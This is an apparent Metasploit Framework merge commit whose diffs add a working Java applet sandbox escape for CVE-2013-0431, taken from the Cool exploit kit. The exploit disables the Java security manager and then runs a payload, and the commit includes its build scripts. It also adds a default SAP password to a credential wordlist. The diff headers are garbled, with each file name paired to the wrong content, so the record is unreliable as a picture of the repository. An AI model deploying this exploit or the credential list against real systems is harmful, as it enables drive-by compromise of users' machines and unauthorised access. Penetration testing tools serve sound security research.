Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7

Author: egypt

data/exploits/cve-2013-0431/B.class

@@ -6,6 +6,7 @@ SAPCPIC ADMIN
 EARLYWATCH SUPPORT
 TMSADM PASSWORD
 TMSADM ADMIN
+TMSADM $1Pawd2&
 ADMIN welcome
 ADSUSER ch4ngeme
 ADS_AGENT ch4ngeme

data/exploits/cve-2013-0431/Exploit.class

@@ -0,0 +1,19 @@
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class B
+  implements PrivilegedExceptionAction
+{
+  public B()
+  {
+    try
+    {
+      AccessController.doPrivileged(this); } catch (Exception e) {
+    }
+  }
+
+  public Object run() {
+    System.setSecurityManager(null);
+    return new Object();
+  }
+}

data/exploits/cve-2013-0431/Exploit.ser

@@ -0,0 +1,93 @@
+/*
+*   From Paunch with love (Java 1.7.0_11 Exploit)
+*
+*   Deobfuscated from Cool EK by SecurityObscurity
+*
+*   https://twitter.com/SecObscurity
+*/
+import java.applet.Applet;
+import com.sun.jmx.mbeanserver.Introspector;
+import com.sun.jmx.mbeanserver.JmxMBeanServer;
+import com.sun.jmx.mbeanserver.MBeanInstantiator;
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles.Lookup;
+import java.lang.invoke.MethodType;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
+import javax.management.ReflectionException;
+import java.io.*;
+import metasploit.Payload;
+
+public class Exploit extends Applet
+{
+
+  public void init()
+  {
+
+    try
+    {
+           int length;
+           byte[] buffer = new byte[5000];
+           ByteArrayOutputStream os = new ByteArrayOutputStream();
+
+           // read in the class file from the jar
+           InputStream is = getClass().getResourceAsStream("B.class");
+
+           // and write it out to the byte array stream
+           while( ( length = is.read( buffer ) ) > 0 )
+               os.write( buffer, 0, length );
+
+           // convert it to a simple byte array
+           buffer = os.toByteArray();
+
+          Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");
+
+          Method method = getMethod(class1, "enter", true);
+          Object obj = method.invoke(null, new Object[0]);
+          Method method1 = getMethod(class1, "createClassLoader", false);
+          Object obj1 = method1.invoke(obj, new Object[1]);
+
+          Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
+          Method method2 = getMethod(class2, "defineClass", false);
+
+          Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
+          my_class.newInstance();
+
+          Payload.main(null);
+
+    }
+    catch (Throwable localThrowable){}
+
+  }
+
+
+   private Method getMethod(Class class1, String s, boolean flag)
+  {
+    try {
+      Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
+      Method[] amethod1 = amethod;
+
+      for (int i = 0; i < amethod1.length; i++) {
+        Method method = amethod1[i];
+        String s1 = method.getName();
+        Class[] aclass = method.getParameterTypes();
+        if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
+      }
+    } catch (Exception localException) {  }
+
+    return null;
+  }
+
+  private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
+  {
+    Object obj = null;
+    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
+    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
+
+    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
+    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
+    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
+  }
+
+}
+

data/wordlists/sap_default.txt

@@ -0,0 +1,22 @@
+# rt.jar must be in the classpath!
+
+CLASSES = \
+	Exploit.java  \
+	B.java \
+	Serializer.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java:." $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	java Serializer
+	mv Exploit.class ../../../../data/exploits/cve-2013-0431/
+	mv B.class ../../../../data/exploits/cve-2013-0431/
+	mv Exploit.ser ../../../../data/exploits/cve-2013-0431/
+
+clean:
+	rm -rf *.class
+	rm -rf *.ser

external/source/exploits/cve-2013-0431/B.java

@@ -0,0 +1,20 @@
+import java.io.*;
+
+public class Serializer {
+
+    public static void main(String [ ] args)
+    {
+        try {
+            Exploit b=new Exploit(); // target Applet instance
+            ByteArrayOutputStream baos=new ByteArrayOutputStream();
+            ObjectOutputStream oos=new ObjectOutputStream(baos);
+            oos.writeObject(b);
+            FileOutputStream fos=new FileOutputStream("Exploit.ser");
+            fos.write(baos.toByteArray());
+            fos.close();
+        } catch (Exception ex) {
+            ex.printStackTrace();
+        }
+    }
+
+}

external/source/exploits/cve-2013-0431/Exploit.java

@@ -497,6 +497,14 @@ def module_to_details_hash(m)
 
 			m.targets.each_index do |i|
 				bits << [ :target, { :index => i, :name => m.targets[i].name.to_s } ]
+				if m.targets[i].platform 
+					m.targets[i].platform.platforms.each do |name|
+						bits << [ :platform, { :name => name.to_s.split('::').last.downcase } ]	
+					end 
+				end 
+				if m.targets[i].arch
+					bits << [ :arch, { :name => m.targets[i].arch.to_s } ]
+				end 				
 			end
 
 			if (m.default_target)
@@ -525,7 +533,7 @@ def module_to_details_hash(m)
 			res[:stance] = m.passive? ? "passive" : "aggressive"
 		end
 
-		res[:bits] = bits
+		res[:bits] = bits.uniq
 
 		res
 	end

external/source/exploits/cve-2013-0431/Makefile

@@ -89,7 +89,7 @@ def commands
 			"kill"     => "Kill a job",
 			"load"     => "Load a framework plugin",
 			"loadpath" => "Searches for and loads modules from a path",
-			"popm"     => "Pops the latest module off of the module stack and makes it active",
+			"popm"     => "Pops the latest module off the stack and makes it active",
 			"pushm"    => "Pushes the active or list of modules onto the module stack",
 			"previous" => "Sets the previously loaded module as the current module",
 			"quit"     => "Exit the console",